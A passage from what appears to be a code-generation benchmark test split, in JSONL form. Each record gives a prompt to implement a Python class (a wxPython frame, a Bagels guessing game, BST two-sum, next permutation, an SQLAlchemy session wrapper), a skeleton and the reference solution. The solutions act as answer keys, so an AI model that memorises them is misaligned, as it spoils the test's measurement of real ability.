if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000141", "length_bytes": 3167, "license_type": "no_license", "methods": [{"docstring": 
"Create the MainFrame.", "name": "__init__", "signature": "def __init__(self, parent, id)"}, {"docstring": "Start Computation.", "name": "OnStart", "signature": "def OnStart(self, event)"}, {"docstring": "Stop Computation.", "name": "OnStop", "signature": "def OnStop(self, event)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000570", "prompt": "Implement the Python class `MainFrame` described below.\n\nClass description:\nClass MainFrame.\n\nMethod signatures and docstrings:\n- def __init__(self, parent, id): Create the MainFrame.\n- def OnStart(self, event): Start Computation.\n- def OnStop(self, event): Stop Computation.", "prompted_full_text": "Implement the Python class `MainFrame` described below.\n\nClass description:\nClass MainFrame.\n\nMethod signatures and docstrings:\n- def __init__(self, parent, id): Create the MainFrame.\n- def OnStart(self, event): Start Computation.\n- def OnStop(self, event): Stop Computation.\n\n<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "revision_id": "979436525c57fdaeaa832e960985e0406e123587", "skeleton": "<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n if 
self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "Research/wx doco/somelongthread2_yield.py", "source_repo": "abulka/pynsource", "split": "test", "star_events_count": 271} {"blob_id": "69dabb5cae8f3acf96361909db046b93be96c126", "bodies": ["self.digits = digits\nself.number_of_guesses = 0\nif guesser == 'human':\n self.chosen_number = self.create_num(digits)", "final_number = []\nfirst_digit = randrange(1, 10)\nfinal_number.append(first_digit)\ninfinite_loop_prevention = 0\nwhile len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\nreturn final_number", "self.number_of_guesses += 1\ncodewords = []\ndigits_place = 0\nwhile digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\nif len(codewords) == 0:\n codewords.insert(0, 'Bagels')\nreturn codewords"], "bodies_text": "<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Game", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. 
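
The MainFrame record above keeps the GUI responsive by calling `wx.Yield()` inside the work loop, so the Stop handler gets a chance to set `need_abort` mid-computation. A dependency-free sketch of the same cooperative-abort idea (no display needed; `pump_events` stands in for `wx.Yield()` and the names here are illustrative):

```python
import time

class Worker:
    def __init__(self):
        self.need_abort = False

    def compute(self, steps, pump_events):
        for _ in range(steps):
            time.sleep(0.01)   # the "real work" slice
            pump_events()      # give pending event handlers a chance to run
            if self.need_abort:
                return "aborted"
        return "completed"

w = Worker()
ticks = {"n": 0}

def pump():
    # Simulate the user clicking Stop on the third event pump.
    ticks["n"] += 1
    if ticks["n"] == 3:
        w.need_abort = True

print(w.compute(10, pump))  # -> aborted
```
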
It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000142", "length_bytes": 9238, "license_type": "no_license", "methods": [{"docstring": "Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.", "name": "__init__", "signature": "def __init__(self, guesser='human', digits=3)"}, {"docstring": "This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.", "name": "create_num", "signature": "def create_num(self, digits)"}, {"docstring": "This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.", "name": "compare_guess", "signature": "def compare_guess(self, human_guess)"}], "n_methods": 3, "prompt": "Implement the Python class `Game` described below.\n\nClass description:\nImplement the Game class.\n\nMethod signatures and docstrings:\n- def __init__(self, guesser='human', digits=3): Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\n- def create_num(self, digits): This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\n- def compare_guess(self, human_guess): This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.", "prompted_full_text": "Implement the Python class `Game` described below.\n\nClass description:\nImplement the Game class.\n\nMethod signatures and docstrings:\n- def __init__(self, guesser='human', digits=3): Each game stores the number of guesses as an attribute. 
You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\n- def create_num(self, digits): This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\n- def compare_guess(self, human_guess): This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\n\n<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "revision_id": "beadb0cd62c8f3b4fc1f47f2975e97e939e8419e", "skeleton": "<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. 
It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Game:\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n", "source": "the_stack_v2_python_sparse", "source_path": "StudentWork/RachelKlein/bagels.py", "source_repo": "kevinelong/PM_2015_SUMMER", "split": "test", "star_events_count": 4} {"blob_id": "3d9a4fa16551d9863e59c4f1b1e980c4b2943ae9", "bodies": ["def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\nhashset = set()\nreturn recur(root, k, hashset)", "if not root:\n return []\ndic = set()\nflag = False\n\ndef inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\ninorder(root)\nreturn flag"], "bodies_text": "<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": 
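
The Game record's `compare_guess` is the heart of the Bagels puzzle. A standalone restatement of its Pico/Fermi/Bagels scoring (the `score` function name is mine, not from the record), with sanity checks that run directly:

```python
def score(guess, secret):
    codewords = []
    for i, digit in enumerate(guess):
        if digit == secret[i]:
            codewords.insert(0, 'Fermi')   # right digit, right place
        elif digit in secret:
            codewords.insert(0, 'Pico')    # right digit, wrong place
    return codewords or ['Bagels']         # no digit matched at all

assert score([1, 2, 3], [1, 2, 3]) == ['Fermi', 'Fermi', 'Fermi']
assert score([3, 1, 2], [1, 2, 3]) == ['Pico', 'Pico', 'Pico']
assert score([4, 5, 6], [1, 2, 3]) == ['Bagels']
```
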
"stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000143", "length_bytes": 1757, "license_type": "no_license", "methods": [{"docstring": "思路:回溯+剪枝", "name": "findTarget1", "signature": "def findTarget1(self, root: TreeNode, k: int) -> bool"}, {"docstring": "思路:通过flag来标记是否已找到", "name": "findTarget2", "signature": "def findTarget2(self, root: TreeNode, k: int) -> bool"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002339", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findTarget1(self, root: TreeNode, k: int) -> bool: 思路:回溯+剪枝\n- def findTarget2(self, root: TreeNode, k: int) -> bool: 思路:通过flag来标记是否已找到", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findTarget1(self, root: TreeNode, k: int) -> bool: 思路:回溯+剪枝\n- def findTarget2(self, root: TreeNode, k: int) -> bool: 思路:通过flag来标记是否已找到\n\n<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "revision_id": "e43ee86c5a8cdb808da09b4b6138e10275abadb5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or 
recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/树(Binary Tree)/653. 两数之和 IV - 输入 BST.py", "source_repo": "yiming1012/MyLeetCode", "split": "test", "star_events_count": 2} {"blob_id": "5b52c4153f231b0efb645d96d5aee78fa6c47785", "bodies": ["i = len(nums) - 2\nwhile i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\nif i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\nleft, right = (i + 1, len(nums) - 1)\nwhile left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1", "print('origin nums:{0}'.format(nums))\nn = len(nums)\nmax_num = nums[-1]\nsign = True\nfor i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\nif sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\nelse:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))"], "bodies_text": "<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 
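
The findTarget record just completed uses a hash set of visited values to answer "two sum in a BST" in one traversal. A self-contained check of that approach (`TreeNode` here is the usual minimal stand-in, not taken from the record):

```python
class TreeNode:
    def __init__(self, val, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def find_target(root, k):
    seen = set()
    def recur(node):
        if not node:
            return False
        if k - node.val in seen:   # complement already visited
            return True
        seen.add(node.val)
        return recur(node.left) or recur(node.right)
    return recur(root)

#       5
#      / \
#     3   6
#    / \    \
#   2   4    7
root = TreeNode(5, TreeNode(3, TreeNode(2), TreeNode(4)),
                   TreeNode(6, None, TreeNode(7)))
assert find_target(root, 9) is True    # e.g. 5 + 4
assert find_target(root, 28) is False  # largest possible sum is 6 + 7
```
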
1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000144", "length_bytes": 2561, "license_type": "no_license", "methods": [{"docstring": "方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:", "name": "nextPermutation", "signature": "def nextPermutation(self, nums: List[int])"}, {"docstring": ":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.", "name": "nextPermutation1", "signature": "def nextPermutation1(self, nums: List[int])"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextPermutation(self, nums: List[int]): 方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\n- def nextPermutation1(self, nums: List[int]): :type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextPermutation(self, nums: List[int]): 方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\n- def nextPermutation1(self, nums: List[int]): :type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "revision_id": "f831fd9603592ae5bee3679924f962a3ebce381c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type 
nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n", "source": "the_stack_v2_python_sparse", "source_path": "topic23_math/T31_nextPermutation/interview.py", "source_repo": "GongFuXiong/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "b90ededd96737aa333edb07d1a2a78a2577707cc", "bodies": ["self.logger = logging.getLogger('core.Session')\nself.maker = session_maker\nif isinstance(session_maker, Session):\n self.maker = session_maker.maker", "session = self.maker()\ntry:\n yield session\n session.commit()\nexcept Skip:\n session.rollback()\n raise\nexcept Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\nfinally:\n session.close()"], "bodies_text": "<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = 